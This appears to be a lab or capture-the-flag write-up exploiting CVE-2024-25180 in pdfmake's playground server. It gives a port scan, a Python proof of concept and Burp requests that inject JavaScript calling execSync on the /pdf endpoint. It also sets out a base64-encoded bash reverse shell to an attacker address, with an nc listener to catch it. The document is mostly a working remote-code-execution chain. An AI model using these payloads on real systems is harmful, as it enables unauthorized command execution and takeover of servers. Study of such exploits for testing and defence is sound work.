CVE-2024-25180
Nov 07, 2024
Port scan
$ sudo nmap 192.168.208.42 -p- -Pn -sCV --min-rate=1000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
| 256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_ 256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1234/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 1234 PDFMake
http://192.168.208.42:1234/
// playground requires you to assign document definition to a variable called dd
var dd = {
content: [
'First paragraph',
'Another paragraph, this time a little bit longer to make sure, this line will be divided into at least two lines'
]
}
Arbitrary Code Injection in pdfmake
Overview
pdfmake is a client/server-side PDF printing library written in pure JavaScript.
Affected versions are vulnerable to arbitrary code injection via a crafted POST request to the /pdf path of the bundled playground server. The endpoint evaluates the request's content field as JavaScript (the playground expects a document definition assigned to dd), so an attacker can execute arbitrary commands on the host by sending a specially crafted request.
PoC
import requests

target = "http://ip:port/pdf"   # vulnerable playground endpoint
command = "<COMMAND>"           # OS command to run on the server

# The JavaScript in "content" is evaluated server-side. execSync runs the
# command; the trailing "const dd = 2" supplies the dd variable the
# playground handler expects after our statement has run.
data = {
    "content": "this.process.mainModule.require('child_process').execSync('" + command + "').toString(); const dd = 2"
}

# Sent form-encoded, as in the advisory PoC; the Burp request below sends
# the same field as a JSON body.
resp = requests.post(target, data=data)
print(resp.text)
Replaying the request in Burp Suite (JSON body):
POST /pdf HTTP/1.1
Host: 192.168.208.42:1234
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 106
Origin: http://192.168.208.42:1234
Connection: close
Referer: http://192.168.208.42:1234/
{"content":"this.process.mainModule.require('child_process').execSync('whoami').toString(); const dd = 2"}
The server answers with a TypeError rather than a PDF: the injected statement executed, and the handler failed afterwards because the placeholder dd = 2 is not a valid document definition. The command output is never returned, so execution is blind; a reverse shell is the simplest confirmation.
$ echo 'bash -i >& /dev/tcp/192.168.45.179/8888 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3OS84ODg4IDA+JjEK
{"content":"this.process.mainModule.require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQ1LjE3OS84ODg4IDA+JjEK | base64 -d | bash').toString(); const dd = 2"}
Start the listener before sending the payload; execSync blocks the Node process until the shell exits, so the HTTP request will not return while the shell is alive:
$ nc -nvlp 8888